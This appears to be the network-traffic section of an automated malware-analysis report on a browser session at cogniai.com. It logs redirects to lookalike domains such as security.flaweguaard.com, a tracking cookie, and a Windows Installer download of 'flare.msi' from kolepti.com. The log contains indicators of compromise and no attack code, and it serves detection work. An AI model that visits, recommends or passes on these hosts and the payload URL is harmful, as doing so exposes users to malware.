Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/css/fonts/flaticona1f9.ttf?1895e337cdf1a9a72d08e55e17b16599 HTTP/1.1host: cogniai.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://cogniai.com/wp-content/themes/techze/css/flaticon.css?ver=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/css/fonts/Flaticon.woff HTTP/1.1host: cogniai.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://cogniai.com/wp-content/themes/techze/css/flaticon.css?ver=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic HTTP traffic detected: GET /A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: analytiscnode.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/ss2-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/ss4-1-1.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/ss3-1.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /9a8B7c6D5e4F3a2B1c0D9e8F7a6B5c?wsid=cogniai.com&domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1 | host: security.flaweguaard.com | upgrade-insecure-requests: 1 | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | sec-fetch-site: cross-site | sec-fetch-mode: navigate | sec-fetch-dest: document | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | referer: https://cogniai.com/ | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=0, i
Source: global traffic HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-font-face.min.css?token=e8bbb49528 HTTP/1.1 | host: ka-f.fontawesome.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /releases/v5.15.4/css/free.min.css?token=e8bbb49528 HTTP/1.1 | host: ka-f.fontawesome.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-shims.min.css?token=e8bbb49528 HTTP/1.1 | host: ka-f.fontawesome.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1 | host: security.flaweguaard.com | upgrade-insecure-requests: 1 | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | sec-fetch-site: cross-site | sec-fetch-mode: navigate | sec-fetch-dest: document | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | referer: https://cogniai.com/ | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=0, i
Source: global traffic HTTP traffic detected: GET /api/getUrl HTTP/1.1 | host: analytiwave.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-1.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-2.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-5.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-4.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-3.jpg HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/OpenAI-Logo-PNG.png HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/SNOW_BIG.png HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/pngwing.com-1.png HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /api/getUrl HTTP/1.1 | host: analytiwave.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/62067060d7b91b0004122615.png HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/google-logo-9831.png HTTP/1.1 | host: cogniai.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1 | host: cogniai.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | sec-fetch-site: cross-site | sec-fetch-mode: no-cors | sec-fetch-dest: image | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1 | host: security.flaweguaard.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | sec-fetch-site: same-origin | sec-fetch-mode: no-cors | sec-fetch-dest: image | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.22631.4169/0?CH=902&L=en-US&P=&PT=0x30&WUA=1220.2407.15022.0&MK=4Orv2MymLvHkm74&MD=aW4zM21e HTTP/1.1 | host: slscr.update.microsoft.com | accept: */* | user-agent: Windows-Update-Agent/1220.2407.15022.0 Client-Protocol/2.80
Source: global traffic HTTP traffic detected: GET /log-click HTTP/1.1 | host: security.flaweguaard.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1 | host: security.flaweguaard.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: */* | sec-fetch-site: same-origin | sec-fetch-mode: cors | sec-fetch-dest: empty | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1 | host: security.flaweguaard.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: */* | sec-fetch-site: same-origin | sec-fetch-mode: cors | sec-fetch-dest: empty | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1 | host: security.flaweguaard.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: */* | sec-fetch-site: same-origin | sec-fetch-mode: cors | sec-fetch-dest: empty | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1 | host: security.flaweguaard.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: */* | sec-fetch-site: same-origin | sec-fetch-mode: cors | sec-fetch-dest: empty | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1 | host: security.flaweguaard.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: */* | sec-fetch-site: same-origin | sec-fetch-mode: cors | sec-fetch-dest: empty | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1 | host: security.flaweguaard.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /?verified=true HTTP/1.1 | host: cogniai.com | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | upgrade-insecure-requests: 1 | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | sec-fetch-site: cross-site | sec-fetch-mode: navigate | sec-fetch-dest: document | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=0, i
Source: global traffic HTTP traffic detected: GET /flare.msi HTTP/1.1 | host: kolepti.com | accept: */* | user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /12180 HTTP/1.1 | host: cogniai.com | sec-ch-ua-platform: "Windows" | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | sec-fetch-site: same-origin | sec-fetch-mode: no-cors | sec-fetch-dest: image | referer: https://cogniai.com/?verified=true | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=2, i
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.22631.4169/0?CH=902&L=en-US&P=&PT=0x30&WUA=1220.2407.15022.0&MK=4Orv2MymLvHkm74&MD=aW4zM21e HTTP/1.1 | host: slscr.update.microsoft.com | accept: */* | user-agent: Windows-Update-Agent/1220.2407.15022.0 Client-Protocol/2.80
Source: global traffic HTTP traffic detected: GET /r/r1.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
Source: chrome.exe, 00000000.00000002.1953863051.0000016686FBD000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: cogniai.com
Source: global traffic DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic DNS traffic detected: DNS query: analytiwave.com
Source: global traffic DNS traffic detected: DNS query: analytiscnode.com
Source: global traffic DNS traffic detected: DNS query: security.flaweguaard.com
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: kolepti.com
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: d-nodes.shop
Source: global traffic DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic DNS traffic detected: DNS query: c.pki.goog
Source: global traffic DNS traffic detected: DNS query: beacons.gvt2.com
Source: unknown HTTP traffic detected: POST /report/v4?s=6cd1SddvBaFkfY4vp4z6squzRBnh4p8blvvJ6JFDBEHvgD4KToeL2%2FBNggV0XdBPQbUhRY%2B3KYBg%2FBfxSrbMAXAWSk8UlUXZPLs%2Fagw%3D HTTP/1.1 | host: a.nel.cloudflare.com | content-length: 391 | content-type: application/reports+json | origin: https://analytiwave.com | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept-encoding: gzip, deflate, br, zstd | accept-language: en-US,en;q=0.9 | priority: u=4, i
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | date: Wed, 28 May 2025 21:04:34 GMT | content-type: application/json; charset=utf-8 | server: cloudflare | x-powered-by: Express | access-control-allow-origin: * | etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI" | cf-cache-status: DYNAMIC | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=6cd1SddvBaFkfY4vp4z6squzRBnh4p8blvvJ6JFDBEHvgD4KToeL2%2FBNggV0XdBPQbUhRY%2B3KYBg%2FBfxSrbMAXAWSk8UlUXZPLs%2Fagw%3D"}]} | content-encoding: zstd | cf-ray: 9470b486cbad5287-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 32
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | date: Wed, 28 May 2025 21:04:35 GMT | content-type: application/json; charset=utf-8 | server: cloudflare | x-powered-by: Express | access-control-allow-origin: * | etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI" | cf-cache-status: DYNAMIC | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=SNOJ%2FAAiXyeQWgMTm%2FYtopTmm83K5zZK2upxpUL1K3%2B3rDK1BxMmq0zyrInO2%2BPXtc27%2FUEv19AN788ajKLGqZ5ZekFeiKTfFTg%2Fxwo%3D"}]} | content-encoding: zstd | cf-ray: 9470b48e4b0d5287-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 32
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | date: Wed, 28 May 2025 21:04:38 GMT | content-type: text/html; charset=UTF-8 | server: cloudflare | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | x-powered-by: Express | cache-control: public, max-age=14400 | last-modified: Tue, 08 Apr 2025 17:07:02 GMT | vary: accept-encoding | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ZaIIvSeAGiK3%2BcnQBOtJ5yd1Kby1P3fDgzj770H%2BLf2UgitpLtacr47jCAWfFCxFJ2bQDiQvf4XoknD4HAE8e0bKJRaNn32vP5NOMyTYE5GrOV06hUc%3D"}]} | cf-cache-status: EXPIRED | content-encoding: zstd | cf-ray: 9470b49b1bcdef75-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 818
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | date: Wed, 28 May 2025 21:04:49 GMT | content-type: text/html; charset=UTF-8 | server: cloudflare | x-powered-by: Express | cache-control: public, max-age=0 | last-modified: Tue, 08 Apr 2025 17:07:02 GMT | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=U6%2BpPN4QrUqNeOoDBy5jKD%2BMA%2FvWQ4Vytwil%2FieDjf8hA0BhPSJWKCyAgJ07TM%2F2ogTtLe1TDetLXTnRrYT9RB0pg0lkZx4gI4sgEwS6QngKM%2BqtJFw%3D"}]} | cf-cache-status: DYNAMIC | vary: accept-encoding | content-encoding: zstd | cf-ray: 9470b4e52cf3ef75-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 818
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | date: Wed, 28 May 2025 21:04:52 GMT | content-type: text/html; charset=UTF-8 | server: cloudflare | x-powered-by: Express | cache-control: public, max-age=0 | last-modified: Tue, 08 Apr 2025 17:07:02 GMT | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Q5q4U%2B7%2B0gJ%2BU69ifrDhI5qSXA8VF2m%2FqT0iMPpYPWDOgYucPstlLjk5LSJyVN5MPf%2B22qpu252wpc7loHbLsejebyVZA3%2B8RsI1lwjF2R67g9beZStpww%3D%3D"}]} | cf-cache-status: DYNAMIC | vary: accept-encoding | content-encoding: zstd | cf-ray: 9470b4f25a8fcb93-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 818
